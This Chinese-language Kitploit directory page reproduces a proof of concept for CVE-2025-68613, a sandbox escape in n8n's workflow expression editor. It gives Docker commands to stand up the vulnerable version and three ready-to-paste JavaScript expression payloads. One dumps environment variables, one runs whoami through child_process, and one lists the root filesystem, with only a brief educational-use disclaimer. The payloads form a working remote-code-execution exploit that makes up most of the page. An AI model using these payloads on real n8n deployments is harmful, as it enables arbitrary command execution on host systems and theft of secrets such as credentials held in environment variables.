Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
poc_CVE-2025-68613 — CVE-2025-68613 的 POC | Kitploit
工具/GitHubGitHub/reem-012/poc_cve-2025-68613
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubreem-012/poc_cve-2025-68613

poc_CVE-2025-68613

CVE-2025-68613 的 POC

查看仓库
48个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PoC:n8n沙箱逃逸(CVE-2025-68613)

仅供教育目的 本概念验证展示了n8n中的一个严重漏洞(CVE-2025-68613)。请勿在非您拥有或未经明确许可的系统上使用。

漏洞概述

n8n 1.122.0 之前的版本包含一个远程代码执行(RCE)漏洞。已认证用户可以通过工作流表达式编辑器中的特定JavaScript负载绕过表达式沙箱,在宿主系统上执行任意代码。

1. 设置易受攻击环境

创建一个数据卷并运行易受攻击版本的n8n(例如v1.120.0)。

root@kitploit:~
# Create volume for persistence
docker volume create n8n_data

# Run vulnerable n8n instance
docker run -it --rm \
  --name n8n \
  -p 5678:5678 \
  -v n8n_data:/home/node/.n8n \
  n8nio/n8n:1.120.0

2. 复现步骤

访问界面

导航到 http://localhost:5678 并根据需要完成初始设置。

创建工作流

点击“添加工作流”开始一个空白工作流。

添加易受攻击节点

向工作流添加一个 Set 节点。该节点允许我们定义可以被求值为表达式的值。

配置表达式

在 Set 节点中,修改一个参数(例如 value)并将输入类型更改为 表达式。

3. 利用载荷

在表达式编辑器中输入以下载荷以演示该漏洞。

载荷 1:环境变量转储

该载荷访问 this.process.env 以泄漏容器中的敏感环境变量。

载荷:

root@kitploit:~
{{ (function() {
  return JSON.stringify(this.process.env, null, 2);
})() }}

结果:

载荷 2:远程代码执行(whoami)

该载荷通过访问 process.mainModule.require 加载 child_process 模块来绕过沙箱,从而允许执行任意系统命令。

载荷:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('whoami').toString();
})() }}

结果: 验证正在运行进程的用户上下文。

载荷 3:完整 RCE(列出根目录)

演示浏览文件系统的能力。

载荷:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('ls -la /').toString();
})() }}

结果:

下载工具